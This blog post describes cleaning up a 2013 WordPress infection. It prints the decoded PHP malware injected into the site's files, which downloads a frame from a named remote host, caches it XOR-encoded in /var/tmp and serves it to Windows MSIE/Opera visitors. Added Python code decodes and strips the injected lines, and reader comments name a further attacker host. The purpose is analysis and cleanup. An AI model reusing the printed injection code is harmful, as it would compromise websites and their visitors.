More Attacks On EP Studios!

The battle is still on.  My website went offline unexpectedly this week.  Thanks to the backup guys at Vaultpress who notified me about it.  The site was giving error code 500: “Internal Server Error.”  Oops.  Checking the WordPress files, I found that nearly every php file had this as its first line (enclosed in php tags):

eval(gzinflate(base64_decode('dVRtb9s2EP7sAvsPF…[A large number of letters and numbers]…4w+9/')));

Run through a decoder (base64, then gzinflate, without ever handing the result to eval), this translates into:

if (!defined('frmDs')) { define('frmDs', 1);
    // Fetch a URL with curl, or file_get_contents() if curl is missing.
    function frm_dl($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec($ch); if (curl_errno($ch) !== 0) $out = false; curl_close($ch);
        } else { $out = file_get_contents($url); }
        return trim($out);
    }
    // XOR every byte with '*'; the same call both encrypts and decrypts the cache.
    function frm_crpt($in) {
        $il = strlen($in); $o = '';
        for ($i = 0; $i < $il; $i++) $o .= $in[$i] ^ '*';
        return $o;
    }
    // Return the frame to inject: re-fetched from the remote server whenever the
    // XORed cache /var/tmp/sess_<md5('frm_frame')> is missing or over 5 minutes old.
    function frm_getfrm() {
        $defframe =

[ I had to exclude some html code here, WordPress doesn't like it]

        $codelink = 'http://ghenkdwmk.myfw.us/nc/gnc.php?ver=jquery.latest.js';
        if (!$codelink) { return $defframe; }
        $dr = '/var/tmp'; $f = $dr . '/sess_' . md5('frm_frame');
        if (!file_exists($f) || time() - filemtime($f) > 60*5) {
            $dlc = frm_dl($codelink);
            if ($dlc) {
                if ($fp = @fopen($f, 'w')) { fwrite($fp, frm_crpt($dlc)); fclose($fp); }
                else return $dlc;
            } else @unlink($f);
        }
        $fc = @file_get_contents($f);
        return ($fc) ? frm_crpt($fc) : $defframe;
    }
    // Only Windows visitors on MSIE or Opera get the frame, once per week
    // (tracked with the __utmfr cookie); everyone else sees the normal page.
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua)) {
        error_reporting(0);
        if (!isset($_COOKIE['__utmfr']) && $nfc = frm_getfrm()) {
            @setcookie('__utmfr', rand(1,1000), time()+86400*7, '/');
            print($nfc);
        }
    }
}
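Decoding the prologue by hand, one file at a time, does not scale to a whole WordPress tree. Here is an added Python example (not code from the original post) that undoes base64_decode and gzinflate statically, so the payload is never executed: gzinflate is raw DEFLATE with no zlib header, which is why zlib is called with a negative window size. It then strips the first line from every .php file that carries the prologue and returns the decoded payload per file, so the copies can be compared. The encode_payload helper exists only to build a fixture resembling the infected files; the fixture content is constructed here, not taken from the post.

```python
import base64
import os
import re
import zlib

# The injected first line described in the post: eval(gzinflate(base64_decode('...')))
# wrapped in PHP tags. Only the base64 blob is captured; it is never executed.
PROLOGUE_RE = re.compile(
    r"^\s*<\?php\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\("
    r"\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)\s*;\s*\?>\s*$"
)


def decode_payload(b64: str) -> str:
    """Undo base64_decode() and gzinflate() statically.

    PHP's gzinflate() is raw DEFLATE (no zlib/gzip header), hence the
    negative window size passed to zlib.
    """
    raw = base64.b64decode(b64)
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", errors="replace")


def encode_payload(php: str) -> str:
    """Build the same prologue from plain PHP. Used only to construct a
    fixture that mirrors the infected files; not needed for cleanup."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = comp.compress(php.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    return f"<?php eval(gzinflate(base64_decode('{b64}'))); ?>"


def clean_source(text: str):
    """Return (cleaned_text, decoded_payload).

    decoded_payload is None, and the text comes back untouched, when the
    first line is not the injected prologue.
    """
    first, _, rest = text.partition("\n")
    m = PROLOGUE_RE.match(first)
    if not m:
        return text, None
    return rest, decode_payload(m.group(1))


def clean_tree(root: str) -> dict:
    """Strip the prologue from every .php file under root, rewriting the file
    in place, and return {path: decoded_payload} so the copies can be compared
    (every infected file should yield the same payload)."""
    found = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            # surrogateescape round-trips any non-UTF-8 bytes unchanged.
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            cleaned, payload = clean_source(text)
            if payload is None:
                continue
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
            found[path] = payload
    return found


if __name__ == "__main__":
    import tempfile

    # Constructed fixture: one infected and one clean file in a scratch tree.
    with tempfile.TemporaryDirectory() as tmp:
        infected = encode_payload("if (!defined('frmDs')) { define('frmDs', 1); }")
        with open(os.path.join(tmp, "index.php"), "w") as fh:
            fh.write(infected + "\n<?php\n// original index.php\n")
        with open(os.path.join(tmp, "wp-config.php"), "w") as fh:
            fh.write("<?php\n// untouched\n")
        for path, payload in clean_tree(tmp).items():
            print(path, "->", payload)
```

Run clean_tree against a copy of the web root rather than the live tree first, and diff the returned payloads: if one file decodes to something different from the rest, that file deserves a closer look before anything is deleted.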

After manually deleting this evil first line from the many infected php scripts, I thought I was making progress.  Everything cleaned up and … Bang!  The lines were back again!  I decided to look a little more closely at the php code.  Clearly there was some file that was doing all this code injection and I hadn’t deleted it.  The answer was in this code:

if (!$codelink){ return $defframe; } $dr='/var/tmp'; $f =
$dr.'/sess_'.md5('frm_frame'); if(!file_exists($f) || time() -

The code downloads a file and places it in the /var/tmp directory.  The file name is 'sess_' followed by md5('frm_frame'), the hash of a fixed string, so it is the same name every time.  Looking in /var/tmp, lo and behold, it was there, a file that looked like binary garbage.  It is not a program, though: it is the cached copy of whatever the remote server returned, XORed with '*' by the frm_crpt function above, and the injected first lines re-download it whenever it is missing or more than five minutes old.  I deleted it and waited.  After a few minutes it was back, reconstituted by the scripts in the WordPress php files, exactly as that code says it will be.  I deleted it again, used chmod to set the permissions of /var/tmp to 444 (read-only by everyone, even the owner, and with no execute bit nothing can create a file in the directory – ha!; anything else that legitimately writes to /var/tmp breaks too, so treat this as a stopgap, not a fix), and went about deleting all the first lines of each infected file again.  Turns out the website still didn't work.  Examining the error logs showed that the stupid virus or trojan or whatever you'd call it had corrupted one of the php files.  I downloaded the WordPress package, copied the good file over the bad file and, — ta-da! — website is up and running (so far).  Cleaning the first lines and the cache still leaves the question of what wrote those first lines into the files; that is a separate backdoor, and until it is found the prologues can come back.  Now to the perps.  In the code above is the website of the bad guys: ghenkdwmk.myfw.us.  Whatever that's supposed to mean. Pinging them (I wouldn't advise visiting their site) gave a response, and an IP address of 151.248.123.170.  Traceroute led right to a bunch of servers in Russia (http://ovzhost60.vps.reg.ru/) .  A web ip tracer gave this map.
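The decoded frm_getfrm() explains both why the cache file keeps coming back and why it looks like binary. The following added Python example (not the author's code) reproduces that logic so a cleanup can be checked: the cache name is a constant MD5, the "encryption" is a single-byte XOR that undoes itself, the refresh window is five minutes, and the frame is served only to Windows visitors with an MSIE or Opera user agent who do not yet carry the __utmfr cookie. That last gate matters: loading the site from Linux or a modern browser shows a clean page even while the infection is live. The sample frame bytes and user agents below are constructed for the demonstration.

```python
import hashlib
import re
import time
from typing import Optional

CACHE_DIR = "/var/tmp"          # $dr in the decoded prologue
REFRESH_SECONDS = 60 * 5        # time() - filemtime($f) > 60*5
XOR_KEY = ord("*")              # frm_crpt() XORs every byte with '*'


def cache_path(cache_dir: str = CACHE_DIR) -> str:
    """$dr.'/sess_'.md5('frm_frame'): the suffix is the MD5 of a fixed string,
    so the cache gets exactly the same name every time it is recreated."""
    return f"{cache_dir}/sess_{hashlib.md5(b'frm_frame').hexdigest()}"


def frm_crpt(data: bytes) -> bytes:
    """Python twin of the PHP frm_crpt(): single-byte XOR, its own inverse."""
    return bytes(b ^ XOR_KEY for b in data)


def decode_cache(data: bytes) -> str:
    """Recover the HTML frame from the raw bytes of a cache file."""
    return frm_crpt(data).decode("utf-8", errors="replace")


def read_cached_frame(path: str) -> str:
    """Decode a cache file copied off the server for analysis."""
    with open(path, "rb") as fh:
        return decode_cache(fh.read())


def is_stale(mtime: float, now: Optional[float] = None) -> bool:
    """True when the cache is older than the refresh window, i.e. the next
    targeted request will re-download the frame from the remote host."""
    now = time.time() if now is None else now
    return now - mtime > REFRESH_SECONDS


def is_targeted(user_agent: str, cookies: dict) -> bool:
    """Mirror the gate around print($nfc): Windows plus MSIE or Opera in the
    user agent, and no __utmfr cookie yet. Anyone else gets the clean page,
    which is why a cleanup check from Linux or Firefox proves nothing."""
    if not (re.search(r"Windows", user_agent) and re.search(r"MSIE|Opera", user_agent)):
        return False
    return "__utmfr" not in cookies


if __name__ == "__main__":
    # Constructed sample: what a cache file would hold for a small frame.
    sample_frame = b'<iframe src="http://example.invalid/" width="1" height="1"></iframe>'
    on_disk = frm_crpt(sample_frame)        # looks like binary junk in /var/tmp
    print("cache file:", cache_path())
    print("decoded   :", decode_cache(on_disk))
    print("stale after 5 min:", is_stale(time.time() - 301))
    for ua in ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
               "Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Firefox/20.0"):
        print(f"{ua[:40]:40} targeted={is_targeted(ua, {})}")
```

To verify a cleanup from a browser, send a Windows MSIE or Opera user agent (curl -A works) and clear the __utmfr cookie first; a request that passes is_targeted and still returns no frame is the test that actually means something.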

[Screenshot from 2013-04-01 18:20:54: IP geolocation map. Caption: Where the bad guys are.]
[Screenshot from 2013-04-01 19:07:09: satellite view of the same location. Caption: Must be a boring place to live.]

Satellite imagery confirms that yes, this is the middle of nowhere (Siberia maybe?).  Bear in mind that the hostname (vps.reg.ru) marks this as a rented virtual server at a hosting provider, so the map shows where the provider's address block is registered, not where whoever rented the box actually sits.  Still, I guess they've got nothing better to do in this part of Russia than mess up other people's websites.  Losers.  I've got my eye on you…

By mannd

I am a retired cardiac electrophysiologist who has worked both in private practice in Louisville, Kentucky and as a Professor of Medicine at the University of Colorado in Denver. I am interested not only in medicine, but also in computer programming, music, science fiction, fantasy, 30s pulp literature, and a whole lot more.

12 comments

  1. I’m hacked with this… Does this only affect wordpress php files? As only those seem to be affected. Please confirm

  2. Thanx for the quick response.

    So, I spent a few hours cleaning these files. I was able to find a fix from here – http://theandystratton.com/2010/shared-godaddy-hosting-wordpress-malware-hack-fix

    The script allows you to find all the infected files; I had 300+ files, which I have now cleaned. This also affected php files which were outside the wordpress installation. The files which are targeted have the names “index, page, config, core, header, footer”.

    I wanted to ask if you were able to identify this as a script or server vulnerability?

  3. @NN I am using the plugin Better WP Security, but wasn’t at the time of the attack. I believe the initial attack was from an earlier version of WordPress security hole, but I don’t know for sure. I also had lots of affected files, but they kept reappearing after cleaning. Since I found the two backdoors (the binary starting with sess_ in /var/tmp, and the fetpd.php file in wp-admin/users) I have not had any more problems. All the files affected were owned by www-data, which is the generic low-permission apache2 user, so I don’t think the attacker had root access. Having said that, on a prior attack my server was infected by the SUCKIT rootkit, but I totally wiped my disk and reinstalled Ubuntu Server after that. I don’t think that was related to the recent attack. I would advise you to keep checking for infected files, just in case there is still a backdoor left open.

  4. Hi,

    Thanx for the update.

    I deleted all wordpress files and uploaded the latest version, since then I have not seen any infected files. I believe this was from something in a plugin I used or as you said, a wordpress hole.

    Thanx!

  5. In the same code of my site is the website of the bad guys: zqyyiogdmox.findhere.org. Whatever that’s supposed to mean. Pinging them (I wouldn’t advise visiting their site) gave a response, and an IP address of 67.208.74.71. Traceroute led right to a bunch of servers in USA. A web ip tracer gave this map: http://bestpics.ru/viewpic/67.208.74.71.jpg
    Satellite imagery confirms that yes, this is the middle of nowhere (near to Washington maybe?): http://bestpics.ru/full/67.208.74.71_sat.jpg So, I guess they’ve got nothing better to do in this part of USA than mess up other people’s websites . Losers. I’ve got my eye on you…

  6. Hi,

    did you ever examine which script in particular did it? I mean, WHAT script/file exactly was doing the injection in the PHP files?

    1. As I recall there were a number of backdoors but I don’t know what the exact initial point of attack was that got them there. It was an older version of WordPress and (hopefully) may not be relevant now. After I wrote the post I did find some additional malignant code in the WordPress phpmyadmin plugin which I deleted. This plugin apparently is notorious for vulnerabilities and maybe was the initial attack site, or maybe it was an unrelated attack. The bad code was javascript in this module. I removed the whole plugin and I recommend doing the same thing if you are using it.

      1. Yeah, I have the idea that a timthumb function in a WP theme did it. My problem is… having some dozens of WP installs on a server, and I’ve been trying for days to find the source of this hack, since the timthumb idea is only an assumption. Thanks for your reaction.
